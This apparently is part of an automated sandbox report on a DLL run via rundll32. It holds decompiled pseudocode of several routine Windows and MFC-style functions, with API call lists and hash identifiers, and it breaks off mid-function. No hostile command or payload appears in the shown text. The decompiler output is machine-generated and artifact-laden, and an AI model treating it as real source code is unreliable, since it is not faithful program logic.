                                                                                                        • Instruction Fuzzy Hash: F7214DB5500745DEE351CF24C841B97B6E8FF08740F80891DF5AADB281DBB4B9048B55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E1000ADD7(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                                                                        				intOrPtr* _v0;
                                                                                                        				void* _v4;
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v16;
                                                                                                        				void* _t20;
                                                                                                        				intOrPtr* _t23;
                                                                                                        				void* _t29;
                                                                                                        				void* _t31;
                                                                                                        				intOrPtr _t35;
                                                                                                        				char _t36;
                                                                                                        				void* _t40;
                                                                                                        				void* _t42;
                                                                                                        				void* _t44;
                                                                                                        
                                                                                                        				_t44 = __eflags;
                                                                                                        				_t38 = __esi;
                                                                                                        				_t37 = __edi;
                                                                                                        				_t31 = __ebx;
                                                                                                        				_push(4);
                                                                                                        				E1003EE82(0x10053219, __ebx, __edi, __esi);
                                                                                                        				_t35 = E1000775D(_t44, 0xc);
                                                                                                        				_v16 = _t35;
                                                                                                        				_t20 = 0;
                                                                                                        				_v4 = 0;
                                                                                                        				if(_t35 != 0) {
                                                                                                        					_t20 = E1000ADA5(_t35);
                                                                                                        				}
                                                                                                        				_t36 = _a4;
                                                                                                        				_v8 = _v8 | 0xffffffff;
                                                                                                        				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                                                                        				_a4 = _t20;
                                                                                                        				E1003EF44( &_a4, 0x100677e8);
                                                                                                        				asm("int3");
                                                                                                        				_t40 = _t42;
                                                                                                        				_t23 = _v0;
                                                                                                        				_push(_t31);
                                                                                                        				if(_t23 != 0) {
                                                                                                        					 *_t23 = 0;
                                                                                                        				}
                                                                                                        				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                                                                        					E100083B8(0, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                                                                        					LocalFree(_a12);
                                                                                                        					_t29 = 1;
                                                                                                        					__eflags = 1;
                                                                                                        				} else {
                                                                                                        					 *_a4 = 0;
                                                                                                        					_t29 = 0;
                                                                                                        				}
                                                                                                        				return _t29;
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000ADDE
                                                                                                          • Part of subcall function 1000775D: _malloc.LIBCMT ref: 10007777
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1000AE14
                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,B5E27FEF,00000000,00000000,00000000,?,?,100677E8,00000004,100011A6,?,10001FDB,80070057), ref: 1000AE3D
                                                                                                          • Part of subcall function 100083B8: _wctomb_s.LIBCMT ref: 100083C8
                                                                                                        • LocalFree.KERNEL32(B5E27FEF,B5E27FEF), ref: 1000AE66
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 1615547351-0
                                                                                                        • Opcode ID: 2d1b435c7322724e9d553a996b3d2a1b74e4904f6292b957ce885ee692cb129d
                                                                                                        • Instruction ID: 5b4a9e45cfd546e6d573b237456e0d2ef36e7630c840a45fd8d59c220cb60ffd
                                                                                                        • Opcode Fuzzy Hash: 2d1b435c7322724e9d553a996b3d2a1b74e4904f6292b957ce885ee692cb129d
                                                                                                        • Instruction Fuzzy Hash: 521186B1604249AFEF01DFB4DC81D9E3BA9FB05790F104629F919DA191D731DE50CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E10009E29(void* __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t23;
                                                                                                        				void* _t28;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t32;
                                                                                                        				signed int _t34;
                                                                                                        				signed short _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed short* _t40;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_push(_t28);
                                                                                                        				_t37 = __ecx;
                                                                                                        				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                        				_t40 =  *(__ecx + 0x60);
                                                                                                        				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                        					_t32 =  *(E1000AB19(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                        					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					_t40 = LockResource(_v8);
                                                                                                        				}
                                                                                                        				_t30 = 1;
                                                                                                        				if(_t40 != 0) {
                                                                                                        					_t35 =  *_t40;
                                                                                                        					if(_t40[1] != 0xffff) {
                                                                                                        						_t23 = _t40[5] & 0x0000ffff;
                                                                                                        						_t34 = _t40[6] & 0x0000ffff;
                                                                                                        					} else {
                                                                                                        						_t35 = _t40[6];
                                                                                                        						_t23 = _t40[9] & 0x0000ffff;
                                                                                                        						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                        					}
                                                                                                        					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                        						_t30 = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if( *(_t37 + 0x58) != 0) {
                                                                                                        					FreeResource(_v8);
                                                                                                        				}
                                                                                                        				return _t30;
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 10009E4F
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 10009E57
                                                                                                        • LockResource.KERNEL32(00000000), ref: 10009E69
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 10009EB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 5fb930c99323afcddb2408e569f4f5418e03a578064818caed3c6f0fe0509fdd
                                                                                                        • Instruction ID: 41330bfbac2e30994af2f79ab8d9a084fe1f88da57a0411100a05bc76d769def
                                                                                                        • Opcode Fuzzy Hash: 5fb930c99323afcddb2408e569f4f5418e03a578064818caed3c6f0fe0509fdd
                                                                                                        • Instruction Fuzzy Hash: 85119E355007A5EBE750DFA5C888AABB7F9FF006D6F11842AE84253564D371AE40DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 86%
                                                                                                        			E10038403(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				int _v8;
                                                                                                        				int _t21;
                                                                                                        				intOrPtr _t32;
                                                                                                        				int _t36;
                                                                                                        				void* _t46;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_push(__ecx);
                                                                                                        				_t46 = __ecx;
                                                                                                        				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                        				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                        				_v8 = _t21;
                                                                                                        				OffsetRect(__ecx + 0x28, _t36, _t21);
                                                                                                        				OffsetRect(_t46 + 0x48, _t36, _v8);
                                                                                                        				OffsetRect(_t46 + 0x38, _t36, _v8);
                                                                                                        				OffsetRect(_t46 + 0x58, _t36, _v8);
                                                                                                        				_t48 =  *((intOrPtr*)(_t46 + 0x80));
                                                                                                        				 *((intOrPtr*)(_t46 + 4)) = _a4;
                                                                                                        				 *((intOrPtr*)(_t46 + 8)) = _a8;
                                                                                                        				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
                                                                                                        					_t32 = E10037F56();
                                                                                                        				} else {
                                                                                                        					_t32 = 0;
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
                                                                                                        				return E100382A4(_t46, _t48, 0);
                                                                                                        			}









                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: OffsetRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 177026234-0
                                                                                                        • Opcode ID: 9004986a9e5b848e8884dc12bf4f03af3621e9a32ee2ab351af175bcae816a3c
                                                                                                        • Instruction ID: f516f793a2001ad18744dfb278574cf489e17ebe1a6fbf015eee1a85f101740b
                                                                                                        • Opcode Fuzzy Hash: 9004986a9e5b848e8884dc12bf4f03af3621e9a32ee2ab351af175bcae816a3c
                                                                                                        • Instruction Fuzzy Hash: 1B110C71600709AFDB11DFA9C984D9BB7ECEB48654F00482AF54AD7610E670FE449B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1001BE02(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v24;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t13;
                                                                                                        				CHAR* _t21;
                                                                                                        				char* _t24;
                                                                                                        				intOrPtr _t28;
                                                                                                        				void* _t30;
                                                                                                        				signed int _t31;
                                                                                                        
                                                                                                        				_t28 = __edx;
                                                                                                        				_t13 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t13 ^ _t31;
                                                                                                        				_t24 = _a8;
                                                                                                        				_t30 = __ecx;
                                                                                                        				_t29 = _a4;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                        					E1003F3D3( &_v24, 0x10, 0x10062f20, _a12);
                                                                                                        					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                        				} else {
                                                                                                        					_t30 = E1001BD53(__ecx, _t29);
                                                                                                        					if(_t30 != 0) {
                                                                                                        						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                        						_t29 = _t21;
                                                                                                        						RegCloseKey(_t30);
                                                                                                        						_t18 = 0 | _t21 == 0x00000000;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E10039F21(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1001BE3B
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1001BE44
                                                                                                        • _swprintf.LIBCMT ref: 1001BE61
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001BE72
                                                                                                        Similarity
                                                                                                        • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 4210924919-0
                                                                                                        • Opcode ID: 8621adc8c6bf9ab1f721a16dd1c6c81c545cdfa4c7366de74b06408087212504
                                                                                                        • Instruction ID: 63a16b530c07007ae9887fddb737f9485d76bd101c9f4a5fdbc11a5c8fdd0245
                                                                                                        • Opcode Fuzzy Hash: 8621adc8c6bf9ab1f721a16dd1c6c81c545cdfa4c7366de74b06408087212504
                                                                                                        • Instruction Fuzzy Hash: E9018076501619ABDB11DF648C85FAF73BCEF48B54F000429FA01AB190DB74EA4587A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E1002E006(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				struct tagPOINT _v12;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t21;
                                                                                                        				signed int _t22;
                                                                                                        				signed int _t28;
                                                                                                        				void* _t29;
                                                                                                        				void* _t33;
                                                                                                        				signed int _t34;
                                                                                                        				intOrPtr* _t37;
                                                                                                        
                                                                                                        				_t29 = __ebx;
                                                                                                        				_push(__ecx);
                                                                                                        				_push(__ecx);
                                                                                                        				_t37 = __ecx;
                                                                                                        				if(_a8 == 1) {
                                                                                                        					GetCursorPos( &_v12);
                                                                                                        					ScreenToClient( *(_a4 + 0x20),  &_v12);
                                                                                                        					_t21 = E1002DBEF(_t37, __eflags, _v12.x, _v12.y);
                                                                                                        					__eflags = _t21;
                                                                                                        					if(_t21 < 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_push(_t33);
                                                                                                        					_t32 = _t37;
                                                                                                        					_t34 = E1002D941(_t37, _t33, _t21);
                                                                                                        					__eflags = _t34 - 8;
                                                                                                        					if(_t34 != 8) {
                                                                                                        						L7:
                                                                                                        						__eflags = _t34 - 0xa;
                                                                                                        						if(__eflags >= 0) {
                                                                                                        							E1000836F(_t29, _t32, _t34, _t37, __eflags);
                                                                                                        						}
                                                                                                        						L9:
                                                                                                        						SetCursor( *(0x100991a8 + _t34 * 4));
                                                                                                        						_t22 = 1;
                                                                                                        						__eflags = 1;
                                                                                                        						L10:
                                                                                                        						return _t22;
                                                                                                        					}
                                                                                                        					_push(_v12.y);
                                                                                                        					_t28 = PtInRect(_t37 + 8, _v12);
                                                                                                        					__eflags = _t28;
                                                                                                        					if(_t28 != 0) {
                                                                                                        						goto L9;
                                                                                                        					}
                                                                                                        					__eflags =  *(_t37 + 4) & 0x00000004;
                                                                                                        					if(( *(_t37 + 4) & 0x00000004) == 0) {
                                                                                                        						goto L9;
                                                                                                        					}
                                                                                                        					_t34 = 9;
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				_t22 = 0;
                                                                                                        				goto L10;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 1002E01C
                                                                                                        • ScreenToClient.USER32 ref: 1002E02C
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002E05D
                                                                                                        • SetCursor.USER32(00000000,?,?,?,?,?,?,?,10016E3E,?,?,?,?), ref: 1002E081
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$ClientRectScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2390797981-0
                                                                                                        • Opcode ID: a9abb34cb98f277d707bb7e7bae4d3ff0d3bc2f2f2ea8917eb2102ee4ba9cb04
                                                                                                        • Instruction ID: 791318b90d64d38265a52a78ea0392a30d2ed37d4304caab3f00ae5e0b43f854
                                                                                                        • Opcode Fuzzy Hash: a9abb34cb98f277d707bb7e7bae4d3ff0d3bc2f2f2ea8917eb2102ee4ba9cb04
                                                                                                        • Instruction Fuzzy Hash: 6901C036640196BFDF10DBA5DC88E8E7BB9EF48350F800025F909E6021E770EE829B20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E10025A85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
                                                                                                        				struct _FILETIME _v12;
                                                                                                        				struct _SYSTEMTIME _v28;
                                                                                                        				char _v36;
                                                                                                        				intOrPtr _v48;
                                                                                                        				void* __ebp;
                                                                                                        				short _t24;
                                                                                                        				int _t27;
                                                                                                        				int _t29;
                                                                                                        				intOrPtr _t38;
                                                                                                        				intOrPtr _t48;
                                                                                                        				void* _t55;
                                                                                                        				void* _t58;
                                                                                                        
                                                                                                        				_t49 = __edi;
                                                                                                        				_t40 = __ebx;
                                                                                                        				_t55 = _t58;
                                                                                                        				if(_a8 != 0) {
                                                                                                        					_push(__esi);
                                                                                                        					_v28.wYear = E10025882();
                                                                                                        					_v28.wMonth = E100258A2();
                                                                                                        					_v28.wDay = E100258BE();
                                                                                                        					_v28.wHour = E100258D9();
                                                                                                        					_v28.wMinute = E100258F5();
                                                                                                        					_t24 = E10025911();
                                                                                                        					_v28.wMilliseconds = _v28.wMilliseconds & 0x00000000;
                                                                                                        					_v28.wSecond = _t24;
                                                                                                        					_t27 = SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                        					_t52 = GetLastError;
                                                                                                        					if(_t27 == 0) {
                                                                                                        						L10030711(__ebx, __edi, GetLastError, _t55, GetLastError(), 0);
                                                                                                        					}
                                                                                                        					_t29 = LocalFileTimeToFileTime( &_v12, _a8);
                                                                                                        					if(_t29 == 0) {
                                                                                                        						_t29 = L10030711(_t40, _t49, _t52, _t55, GetLastError(), _t29);
                                                                                                        					}
                                                                                                        					return _t29;
                                                                                                        				} else {
                                                                                                        					_push(_t55);
                                                                                                        					_push(__ecx);
                                                                                                        					_v36 = 0x100712f0;
                                                                                                        					E1003EF44( &_v36, 0x10067284);
                                                                                                        					asm("int3");
                                                                                                        					_push(4);
                                                                                                        					E1003EE82(0x10052ebc, __ebx, __edi, __esi);
                                                                                                        					_t48 = E10029C33(0x104);
                                                                                                        					_v48 = _t48;
                                                                                                        					_t38 = 0;
                                                                                                        					_v36 = 0;
                                                                                                        					if(_t48 != 0) {
                                                                                                        						_t38 = E1000A475(_t48);
                                                                                                        					}
                                                                                                        					return E1003EF21(_t38);
                                                                                                        				}
                                                                                                        			}
















                                                                                                        APIs
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 10025AE9
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 10025AFB
                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 10025B0A
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 10025B15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1172841412-0
                                                                                                        • Opcode ID: 894e86763a1647e6b861eae4a0b1652b910a36e5a5e852b12ff19705ff0e6fcd
                                                                                                        • Instruction ID: a1c56f44cfdff319654fb8919c51a7ff2848a5b762cfe4f26907821dc1b991ec
                                                                                                        • Opcode Fuzzy Hash: 894e86763a1647e6b861eae4a0b1652b910a36e5a5e852b12ff19705ff0e6fcd
                                                                                                        • Instruction Fuzzy Hash: 4F016129E1026DA6DF00EBF4984699E7BBCEF04611F404046E802B7251EFB5AB408BDD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E1002F123(void* __ecx, void* __eflags) {
                                                                                                        				void* _v8;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t9;
                                                                                                        				void* _t11;
                                                                                                        				int _t13;
                                                                                                        				void* _t23;
                                                                                                        				intOrPtr* _t30;
                                                                                                        				void* _t32;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_t23 = __ecx;
                                                                                                        				_t9 = E1000775D(__eflags, 0x10);
                                                                                                        				_t37 = _t9;
                                                                                                        				if(_t9 == 0) {
                                                                                                        					_t30 = 0;
                                                                                                        					__eflags = 0;
                                                                                                        				} else {
                                                                                                        					_t30 = E1002F106(_t9, _t37);
                                                                                                        				}
                                                                                                        				_t11 = GetCurrentProcess();
                                                                                                        				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                                                                                                        				_t34 = _t32;
                                                                                                        				if(_t13 == 0) {
                                                                                                        					if(_t30 != 0) {
                                                                                                        						 *((intOrPtr*)( *_t30 + 4))(1);
                                                                                                        					}
                                                                                                        					L10030711(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                                                                        				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                                                        				return _t30;
                                                                                                        			}

















                                                                                                        APIs
                                                                                                          • Part of subcall function 1000775D: _malloc.LIBCMT ref: 10007777
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1002F155
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002F15B
                                                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 1002F15E
                                                                                                        • GetLastError.KERNEL32(?), ref: 1002F179
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3704204646-0
                                                                                                        • Opcode ID: 181124b0a72ddab3b984726ea908e0ad10e71abd6c3574166a280de630d29e6b
                                                                                                        • Instruction ID: cd322e7513c6ac6ad6ac0a7b1c10adea35624bb9e47b03c235d11dc91bc2e213
                                                                                                        • Opcode Fuzzy Hash: 181124b0a72ddab3b984726ea908e0ad10e71abd6c3574166a280de630d29e6b
                                                                                                        • Instruction Fuzzy Hash: 2401A735700204BFEB10DBA5DD89F1A7BA9EF84790F544429FD08DB291EB70EC108B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10037973(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
                                                                                                        				struct tagPOINT _v12;
                                                                                                        				void* __edi;
                                                                                                        				struct tagPOINT* _t8;
                                                                                                        				struct HWND__* _t9;
                                                                                                        				int _t14;
                                                                                                        				long _t19;
                                                                                                        				void* _t20;
                                                                                                        				struct HWND__* _t22;
                                                                                                        				struct HWND__* _t23;
                                                                                                        				struct HWND__* _t26;
                                                                                                        
                                                                                                        				_t20 = __edx;
                                                                                                        				_t8 = _a8;
                                                                                                        				_v12.x = _t8->x;
                                                                                                        				_t19 = _t8->y;
                                                                                                        				_push(_t19);
                                                                                                        				_v12.y = _t19;
                                                                                                        				_t9 = WindowFromPoint( *_t8);
                                                                                                        				_t26 = _t9;
                                                                                                        				if(_t26 != 0) {
                                                                                                        					_t22 = GetParent(_t26);
                                                                                                        					if(_t22 == 0 || E10029831(__ebx, _t20, _t22, _t22, 2) == 0) {
                                                                                                        						ScreenToClient(_t26,  &_v12);
                                                                                                        						_t23 = E100298D3(_t26, _v12.x, _v12.y);
                                                                                                        						if(_t23 == 0) {
                                                                                                        							L6:
                                                                                                        							_t9 = _t26;
                                                                                                        						} else {
                                                                                                        							_t14 = IsWindowEnabled(_t23);
                                                                                                        							_t9 = _t23;
                                                                                                        							if(_t14 != 0) {
                                                                                                        								goto L6;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t9 = _t22;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t9;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • WindowFromPoint.USER32(?,?), ref: 1003798A
                                                                                                        • GetParent.USER32(00000000), ref: 10037998
                                                                                                        • ScreenToClient.USER32 ref: 100379B9
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 100379D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871804413-0
                                                                                                        • Opcode ID: 626a3877109c41edea482a46b08a08c39026c642097ed229554150f96915be55
                                                                                                        • Instruction ID: 4463cf6aecc86cd5d7cb116d97b5f3d00f66973d4a6b894517a54b6ed9a5452e
                                                                                                        • Opcode Fuzzy Hash: 626a3877109c41edea482a46b08a08c39026c642097ed229554150f96915be55
                                                                                                        • Instruction Fuzzy Hash: DB014F76600514BFD712DB689C45EAE7AB9FF89681B11426AF905EB310DB30DE01D7A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E1000F078(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t18;
                                                                                                        				struct HWND__* _t20;
                                                                                                        				void* _t22;
                                                                                                        				void* _t23;
                                                                                                        				void* _t24;
                                                                                                        				struct HWND__* _t25;
                                                                                                        
                                                                                                        				_t23 = __ecx;
                                                                                                        				_t22 = __ebx;
                                                                                                        				_t24 = GetTopWindow;
                                                                                                        				_t16 = GetTopWindow(_a4);
                                                                                                        				while(1) {
                                                                                                        					_t25 = _t16;
                                                                                                        					if(_t25 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					__eflags = _a24;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                        					} else {
                                                                                                        						_t20 = E1000E60C(_t23, _t24, _t25, __eflags, _t25);
